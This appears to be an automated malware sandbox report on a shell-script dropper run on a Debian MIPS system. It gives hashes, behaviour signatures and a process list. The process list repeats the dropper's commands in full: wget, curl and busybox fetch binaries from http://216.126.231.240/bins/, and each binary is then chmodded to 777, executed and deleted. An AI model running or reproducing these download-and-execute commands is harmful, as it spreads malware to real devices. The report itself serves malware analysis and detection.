US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/746-1-0xb66fa000-0xb670b044-memory.dmp

memory/813-2-0xb6789000-0xb679a044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-20 03:39

Reported

2024-11-20 03:42

Platform

debian9-mipsbe-20240729-en

Max time kernel

112s

Max time network

114s

Command Line

[/tmp/e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc N/A
N/A /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU N/A
N/A /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX N/A
N/A /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 N/A
N/A /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 N/A
N/A /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ N/A
N/A /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc N/A
N/A /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv N/A
N/A /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd N/A
N/A /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp N/A
N/A /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN N/A
N/A /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t N/A
N/A /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK N/A
N/A /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D N/A
N/A /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN N/A
N/A /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t N/A
N/A /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK N/A
N/A /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D N/A
N/A /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU N/A
N/A /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX N/A
N/A /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 N/A
N/A /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 N/A
N/A /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ N/A
N/A /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc N/A
N/A /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc N/A
N/A /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv N/A
N/A /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd N/A
N/A /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX /usr/bin/curl N/A
File opened for modification /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN /usr/bin/curl N/A
File opened for modification /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t /usr/bin/curl N/A
File opened for modification /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX /usr/bin/curl N/A
File opened for modification /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc /usr/bin/curl N/A
File opened for modification /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 /usr/bin/curl N/A
File opened for modification /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd /usr/bin/curl N/A
File opened for modification /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D /usr/bin/curl N/A
File opened for modification /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ /usr/bin/curl N/A
File opened for modification /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd /usr/bin/curl N/A
File opened for modification /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU /usr/bin/curl N/A
File opened for modification /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK /usr/bin/curl N/A
File opened for modification /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp /usr/bin/curl N/A
File opened for modification /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp /usr/bin/curl N/A
File opened for modification /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK /usr/bin/curl N/A
File opened for modification /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv /usr/bin/curl N/A
File opened for modification /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t /usr/bin/curl N/A
File opened for modification /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 /usr/bin/curl N/A
File opened for modification /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv /usr/bin/curl N/A
File opened for modification /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D /usr/bin/curl N/A
File opened for modification /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 /usr/bin/curl N/A
File opened for modification /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc /usr/bin/curl N/A
File opened for modification /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN /usr/bin/curl N/A
File opened for modification /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc /usr/bin/curl N/A
File opened for modification /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ /usr/bin/curl N/A
File opened for modification /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU /usr/bin/curl N/A
File opened for modification /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc /usr/bin/curl N/A
File opened for modification /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 /usr/bin/curl N/A

Processes

/tmp/e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh

[/tmp/e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/bin/chmod

[chmod 777 THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc

[./THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/bin/rm

[rm THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/usr/bin/wget

[wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/bin/chmod

[chmod 777 dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU

[./dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/bin/rm

[rm dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/usr/bin/wget

[wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/bin/chmod

[chmod 777 O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX

[./O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/bin/rm

[rm O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/usr/bin/wget

[wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/bin/chmod

[chmod 777 rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7

[./rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/bin/rm

[rm rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/usr/bin/wget

[wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/bin/chmod

[chmod 777 UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7

[./UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/bin/rm

[rm UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/usr/bin/wget

[wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/bin/chmod

[chmod 777 gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ

[./gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/bin/rm

[rm gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/usr/bin/wget

[wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/bin/chmod

[chmod 777 BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc

[./BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/bin/rm

[rm BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/usr/bin/wget

[wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/bin/chmod

[chmod 777 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv

[./3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/bin/rm

[rm 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/usr/bin/wget

[wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/bin/chmod

[chmod 777 pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd

[./pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/bin/rm

[rm pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/usr/bin/wget

[wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/bin/chmod

[chmod 777 ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp

[./ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/bin/rm

[rm ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/usr/bin/wget

[wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/chmod

[chmod 777 QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN

[./QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/rm

[rm QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/usr/bin/wget

[wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/chmod

[chmod 777 QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t

[./QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/rm

[rm QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/usr/bin/wget

[wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/chmod

[chmod 777 wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK

[./wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/rm

[rm wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/usr/bin/wget

[wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/chmod

[chmod 777 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D

[./9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/rm

[rm 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/usr/bin/wget

[wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/chmod

[chmod 777 QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN

[./QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/rm

[rm QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/usr/bin/wget

[wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/chmod

[chmod 777 QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t

[./QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/rm

[rm QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/usr/bin/wget

[wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/chmod

[chmod 777 wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK

[./wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/rm

[rm wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/usr/bin/wget

[wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/chmod

[chmod 777 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D

[./9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/rm

[rm 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/usr/bin/wget

[wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/bin/chmod

[chmod 777 dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU

[./dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/bin/rm

[rm dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/usr/bin/wget

[wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/bin/chmod

[chmod 777 O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX

[./O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/bin/rm

[rm O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/usr/bin/wget

[wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/bin/chmod

[chmod 777 rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7

[./rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/bin/rm

[rm rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/usr/bin/wget

[wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/bin/chmod

[chmod 777 UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7

[./UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/bin/rm

[rm UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/usr/bin/wget

[wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/bin/chmod

[chmod 777 gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ

[./gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/bin/rm

[rm gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/usr/bin/wget

[wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/bin/chmod

[chmod 777 THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc

